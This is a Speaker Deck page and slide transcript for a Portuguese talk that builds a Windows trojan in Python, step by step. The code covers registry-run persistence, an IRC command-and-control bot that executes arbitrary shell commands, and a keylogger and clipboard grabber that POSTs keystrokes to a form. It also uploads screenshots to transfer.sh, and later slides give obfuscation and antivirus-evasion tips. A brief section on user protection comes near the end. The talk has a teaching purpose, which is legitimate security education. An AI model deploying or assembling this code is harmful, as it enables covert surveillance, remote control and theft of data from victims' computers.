Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Criando um malware com Python

yyyyyyyan
October 19, 2018
Programming
3
5.3k

Criando um malware com Python

Nos dias de hoje, segurança é um dos tópicos mais importantes em todo o universo da computação e, na verdade, do mundo no geral, envolvendo desde aspectos políticos, como no caso do vírus que afetou centrífugas iranianas, até o lado mais pessoal, como sua prima que teve a conta de uma rede social invadida e nunca entendeu como isso aconteceu. Mas como isso tudo funciona? Um simples malware é tão complicado assim de entender?

Nessa palestra, discutiremos um pouco sobre vírus de computador (leia-se malware) e como eles geralmente funcionam e afetam computadores pessoais. Aprenderemos técnicas e práticas de programação e computação que auxiliam esse tipo de programa e, com isso, construiremos nosso próprio malware em Python, com funcionalidades diversas de ataque, manutenção e defesa contra antivírus, dentre estas:

- Garantindo a execução repetida do malware

- Executando comandos no computador da vítima

- Captura de teclas (keylogger) e de tela

- Obtendo dados diversos da vítima

- Enganando a sandbox do antivírus

E mais, de acordo com o gosto do pessoal que estiver assistindo!

Saia da palestra como um novo hacker (ou melhor, especialista de segurança ;)) e abra caminhos para novas experiências na área de desenvolvimento.

yyyyyyyan

October 19, 2018
Tweet

More Decks by yyyyyyyan

See All by yyyyyyyan
como funcionam as senhas e por que não funcionam: tentando resolver um problema sem solução
yyyyyyyan
0
22
[PyCon APAC 2022] Writing secure code in Python
yyyyyyyan
0
150
Writing secure code in Python
yyyyyyyan
0
200
Escrevendo códigos seguros em Python
yyyyyyyan
1
330
Entendendo sockets no Python criando um bot de IRC
yyyyyyyan
1
370
Python 2 ou Python 3?
yyyyyyyan
1
120
Python 2 or Python 3? - (Finally) Understanding the differences between the two main versions of the language
yyyyyyyan
3
120
Creating a malware using Python
yyyyyyyan
1
480

Other Decks in Programming

See All in Programming
rbs-inlineを導入してYARDからRBSに移行する
euglena1215
1
290
AndroidアプリのUIバリエーションをあの手この手で確認する / Check UI variations of Android apps by various means
tkmnzm
1
170
Jakarta EE meets AI
ivargrimstad
1
520
Rubyとクリエイティブコーディングの輪の広がり / The Growing Circle of Ruby and Creative Coding
chobishiba
1
270
LangChainでWebサイトの内容取得やGitHubソースコード取得
shukob
0
160
Prompt Cachingは本当に効果的なのか検証してみた.pdf
ttnyt8701
0
530
RAGの回答精度評価用のQAデータセットを生成AIに作らせた話
kurahara
0
250
Swiftコードバトル必勝法
toshi0383
0
170
長期運用プロダクトの開発速度を維持し続けるためのリファクタリング実践例
wataruss
8
2.7k
Perl 5 OOP機構30年史 - Perl 5's OOP Mechanism over the past 30 years
moznion
0
270
Why Prism?
kddnewton
4
1.7k
LangChainの現在とv0.3にむけて
os1ma
4
920

Featured

See All Featured
Art, The Web, and Tiny UX
lynnandtonic
294
20k
Designing on Purpose - Digital PM Summit 2013
jponch
114
6.8k
Fontdeck: Realign not Redesign
paulrobertlloyd
80
5.1k
Embracing the Ebb and Flow
colly
83
4.4k
ParisWeb 2013: Learning to Love: Crash Course in Emotional UX Design
dotmariusz
109
6.9k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
28
8.9k
Design by the Numbers
sachag
277
19k
Bash Introduction
62gerente
608
210k
Large-scale JavaScript Application Architecture
addyosmani
508
110k
Build The Right Thing And Hit Your Dates
maggiecrowley
30
2.3k
Mobile First: as difficult as doing things right
swwweet
221
8.8k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
227
52k

Transcript

  1. Olá! Eu sou Yan Orestes Produtor de conteúdo na 1

    @yanorestes

  2. Entendendo o funcionamento de um malware usando Python 2

  3. O que é um malware? Vamos entender esse conceito 3

  4. Malware 4 malicious software software malicioso

  5. Não é só vírus! 5 Ransomware Vírus Worm Malware ...

  6. Qual escolher? 6 Destrutivo Útil X

  7. Cavalo de Troia Dando o máximo de possibilidades para o

    atacante através do Command & Control (C&C) 7

  8. Como? 8

  9. Como? Python 9

  10. Como? Python Por quê? 10

  11. Como? Python Por quê? Por que não? 11

  12. Vítima Windows (8) 12

  13. Um vírus ineficiente destrói seu portador. Um vírus esperto fica

    com ele. 13 - James Lovelock

  14. Garantindo a execução contínua do malware 14 1.

  15. Escondendo o malware em outros programas Fácil de programar Pouca

    efetividade 15

  16. Modificando o Registro do Windows 16 Efetivo Necessita privilégios de

    administrador

  17. Registro 17 Chaves Subchaves

  18. HKEY_LOCAL_MACHINE Run 18

  19. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Run 19

  20. Como fazer isso no Python? 20

  21. Como fazer isso no Python? • winreg 21

  22. Como fazer isso no Python? • winreg • os 22

  23. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 23

  24. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 24

  25. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 25

  26. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 26

  27. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 27

  28. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 28

  29. Como estabelecer a comunicação entre atacante e vítima? 29

  30. Conectando a vítima ao atacante 30 2.

  31. Conexão direta entre atacante e vítima Maior controle Maior vulnerabilidade

    31

  32. Usando serviços externos (como Twitter) Fácil de programar Menos controle

    32

  33. Conectando através de uma rede IRC Maior controle Difícil de

    configurar 33

  34. IRC 34

  35. Como fazer isso no Python? 35

  36. Como fazer isso no Python? • socket 36

  37. 1. import socket 2. class ConexaoAtacante: 3. def __init__(self, endereco_irc):

    4. self.socket = socket.socket() 5. self.socket.connect(endereco_irc) 6. 7. conexao = ConexaoAtacante(('irc.pythonbrasil.net', 6667)) 37

  38. 1. import socket 2. class ConexaoAtacante: 3. def __init__(self, endereco_irc):

    4. self.socket = socket.socket() 5. self.socket.connect(endereco_irc) 6. 7. conexao = ConexaoAtacante(('irc.pythonbrasil.net', 6667)) 38 Só isso?

  39. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 39

  40. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 40

  41. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 41

  42. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 42

  43. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 43

  44. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 44

  45. 1. conexao = ConexaoAtacante(('irc.pythonbrasil.net', 6667), 'MalwareBot') 2. while True: 3.

    cmd = conexao.recebe_comando() 4. # tratar comando recebido Main Loop 45

  46. Como tomar o controle do computador da vítima? 46

  47. Executando comandos no computador da vítima 47 3.

  48. Usando os.system() Muita simplicidade Pouca flexibilidade 48

  49. Muita flexibilidade 49 Usando o módulo subprocess

  50. Usando o módulo subprocess Muita flexibilidade Quê? 50

  51. 51

  52. 52

  53. 53 1. from subprocess import run, PIPE, STDOUT 2. 3.

    def roda_comando_no_shell(cmd): 4. processo_completo = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. resposta = processo_completo.stdout.decode('utf8', errors='ignore') 6. return resposta

  54. 54 mas e a comunicação com o atacante? 1. from

    subprocess import run, PIPE, STDOUT 2. 3. def roda_comando_no_shell(cmd): 4. processo_completo = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. resposta = processo_completo.stdout.decode('utf8', errors='ignore') 6. return resposta

  55. 55 1. class ConexaoAtacante: 2. # Código omitido 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def recebe_comando(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.responde_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Código omitido

  56. 56 1. class ConexaoAtacante: 2. # Código omitido 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def recebe_comando(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.responde_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Código omitido

  57. 57 1. class ConexaoAtacante: 2. # Código omitido 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def recebe_comando(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.responde_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Código omitido

  58. 58 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  59. 59 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  60. 60 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  61. 61 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  62. 62 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  63. Capturando dados do usuário em tempo real 63 4.

  64. Capturando teclas digitadas (keylogger) 64

  65. Como fazer isso no Python? 65

  66. Como fazer isso no Python? • keyboard https://github.com/boppreh/keyboard 66

  67. Como fazer isso no Python? • keyboard • requests http://docs.python-requests.org/en/master

    / 67

  68. Como fazer isso no Python? • keyboard • requests •

    pyperclip https://github.com/asweigart/pyperclip 68

  69. 1. import keyboard 2. 3. teclas_apertadas = [] 4. keyboard.on_press(lambda

    k: teclas_apertadas.append(k.name)) 69

  70. Hello, world! 70 1. import keyboard 2. 3. teclas_apertadas =

    [] 4. keyboard.on_press(lambda k: teclas_apertadas.append(k.name))

  71. Hello, world! shiftHello,spaceworldshift! 71 1. import keyboard 2. 3. teclas_apertadas

    = [] 4. keyboard.on_press(lambda k: teclas_apertadas.append(k.name))

  72. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 72

  73. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 73

  74. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 74

  75. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 75

  76. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 76 e como o atacante acessa isso?

  77. 1. from requests import post 2. 3. url_form = #linkParaForm#

    4. def trata_tecla(k): 5. # Código omitido 6. if len(teclas_apertadas) >= 100: 7. texto_digitado = ''.join(teclas_apertadas) 8. teclas_apertadas.clear() 9. post(url_form, {'entry.1269107664':texto_digitado}) 77

  78. 1. from requests import post 2. 3. url_form = #linkParaForm#

    4. def trata_tecla(k): 5. # Código omitido 6. if len(teclas_apertadas) >= 100: 7. texto_digitado = ''.join(teclas_apertadas) 8. teclas_apertadas.clear() 9. post(url_form, {'entry.1269107664':texto_digitado}) 78

  79. 1. from requests import post 2. 3. url_form = #linkParaForm#

    4. def trata_tecla(k): 5. # Código omitido 6. if len(teclas_apertadas) >= 100: 7. texto_digitado = ''.join(teclas_apertadas) 8. teclas_apertadas.clear() 9. post(url_form, {'entry.1269107664':texto_digitado}) 79

  80. 80 1. from requests import post 2. 3. url_form =

    #linkParaForm# 4. def trata_tecla(k): 5. # Código omitido 6. if len(teclas_apertadas) >= 100: 7. texto_digitado = ''.join(teclas_apertadas) 8. teclas_apertadas.clear() 9. post(url_form, {'entry.1269107664':texto_digitado})

  81. Toque de ouro 81

  82. Toque de ouro 1. from pyperclip import paste 2. 3.

    def trata_copypaste(): 4. texto_copiado = paste() 5. teclas_apertadas.extend(list(texto_copiado)) 6. 7. keyboard.add_hotkey('ctrl+c', trata_copypaste) 82

  83. Capturando a tela da vítima 83

  84. Como fazer isso no Python? 84

  85. Como fazer isso no Python? • pyscreenshot https://github.com/ponty/pyscreensho t 85

  86. Como fazer isso no Python? • pyscreenshot • os 86

  87. Como fazer isso no Python? • pyscreenshot • os •

    requests 87

  88. 1. from pyscreenshot import grab_to_file 2. 3. def tira_screenshot(filename): 4.

    grab_to_file(filename) 88

  89. 1. from pyscreenshot import grab_to_file 2. 3. def tira_screenshot(filename): 4.

    grab_to_file(filename) 5. 6. comandos = {'!shell': roda_comando_no_shell, '!screenshot': tira_screenshot} 89

  90. 1. from pyscreenshot import grab_to_file 2. 3. def tira_screenshot(filename): 4.

    grab_to_file(filename) 5. 6. comandos = {'!shell': roda_comando_no_shell, '!screenshot': tira_screenshot} 90 e como o atacante acessa isso?

  91. 1. from pyscreenshot import grab_to_file 2. from requests import post

    3. 4. def tira_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. resposta = r.text if r.status_code == 200 else 'Erro no upload' 9. return resposta 91

  92. 1. from pyscreenshot import grab_to_file 2. from requests import post

    3. 4. def tira_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. resposta = r.text if r.status_code == 200 else 'Erro no upload' 9. return resposta 92

  93. 1. from os import remove 2. from pyscreenshot import grab_to_file

    3. from requests import post 4. 5. def tira_screenshot(filename): 6. grab_to_file(filename) 7. with open(filename, 'rb') as f: 8. r = post('https://transfer.sh', files={filename: f}) 9. resposta = r.text if r.status_code == 200 else 'Erro no upload' 10. return resposta 11. remove(filename) 93

  94. Extra! 94

  95. Ofuscação de código 95 5.

  96. Compilar para bytecode Fácil Facilmente recuperável 96

  97. Usando pyminifier Divertido Recuperável 97

  98. 98 Usando pyminifier 1. pyminifier -O -o nivel1.py malware.py

  99. 99 Usando pyminifier 1. pyminifier -O -o nivel1.py malware.py 2.

    pyminifier -O --nonlatin -o nivel2.py malware.py

  100. 100 Usando pyminifier 1. pyminifier -O -o nivel1.py malware.py 2.

    pyminifier -O --nonlatin -o nivel2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o nivel3.py malware.py

  101. 101 Usando pyminifier 1. pyminifier -O -o nivel1.py malware.py 2.

    pyminifier -O --nonlatin -o nivel2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o nivel3.py malware.py 4. pyminifier -O --nonlatin --replacement-length=100 --gzip -o nivel4.py malware.py

  102. Escalonamento de privilégios 102 6.

  103. Escalonamento de privilégios 103 6. • Brute force

  104. Escalonamento de privilégios 104 6. • Brute force • Injeção

    de código

  105. 105 E como o usuário pode se proteger?

  106. Precaução 106

  107. Controle das conexões 107

  108. Antivírus? 108

  109. 109 O melhor antivírus é o bom senso - Anônimo

    entendedor de tudo

  110. 110 O melhor antivírus é o bom senso - Anônimo

    entendedor de tudo Será?

  111. Antivírus são insuportáveis 111

  112. Antivírus são insuportáveis 112 Taxas de renovação inesperadas

  113. Antivírus são insuportáveis 113 Taxas de renovação inesperadas Problemas com

    o sistema

  114. Antivírus são insuportáveis 114 Taxas de renovação inesperadas Problemas com

    o sistema aaaaaaaaaaaaaaaaaaaaaaaaa

  115. 2010 - Caso McAfee 115

  116. 2010 - Caso McAfee 116 2011 - Caso MSE

  117. 2010 - Caso McAfee 117 2011 - Caso MSE 2012

    - Caso Sophos

  118. Efetividade baixa 118 2006 - 40-50% 2007 - 20-30%

  119. Efetividade baixa? 119 2006 - 40-50% 2007 - 20-30% 2013

    - 91.1-99.9%

  120. 120 Humanos falham

  121. A não ser que você... 121 • Não compartilhe arquivos

    e/ou links com ninguém • Não permita que ninguém além de você use seu computador • Não use a Internet para compras, entretenimento adulto ou jogos online • Nunca utilize uma rede WiFi pública • Não compartilhe o seu WiFi privado com ninguém • Nunca clique em nenhuma propaganda • Utilize senhas extremamente seguras e nunca repete nenhuma • Não utilize um smartphone • Não faça download de nada pela Internet

  122. A não ser que você... 122 • Não compartilhe arquivos

    e/ou links com ninguém • Não permita que ninguém além de você use seu computador • Não use a Internet para compras, entretenimento adulto ou jogos online • Nunca utilize uma rede WiFi pública • Não compartilhe o seu WiFi privado com ninguém • Nunca clique em nenhuma propaganda • Utilize senhas extremamente seguras e nunca repete nenhuma • Não utilize um smartphone • Não faça download de nada pela Internet • Não utilize um sistema operacional

  123. Proteção contra antivírus 123 7. •

  124. Proteção contra antivírus 124 7. • Assinatura => Código polimórfico

  125. Proteção contra antivírus 125 7. • Assinatura => Código polimórfico

    • Sandbox => Detecção (mouse) https://github.com/boppreh/mouse/

  126. Proteção contra antivírus 126 7. • Assinatura => Código polimórfico

    • Sandbox => Detecção (mouse) • Método heurístico => ?

  127. Muito obrigado! Alguma pergunta? Você pode falar comigo em ▪

    @yanorestes ▪ [email protected] 127 https://speakerdeck.com/yanorestes/criando-um-malware-com-python

  128. Agradecimentos especiais ▪ Python Brasil ▪ Roosevelt Fujikawa ([email protected]) ▪

    Alura/Caelum ▪ Casa do Código (PythonBrasil&CasadoCodigo) 128 15%

  129. Design da apresentação Essa apresentação usa as seguintes fontes: ▪

    Títulos: Work sans bold ▪ Corpo: Work sans light ▪ Código: Arial com formatação do tohtml.com Você pode baixar as fontes nessa página https://github.com/weiweihuanghuang/Work-Sans/tree/master/fonts/desktop 129 Layout dos slides e ícones por SlidesCarnival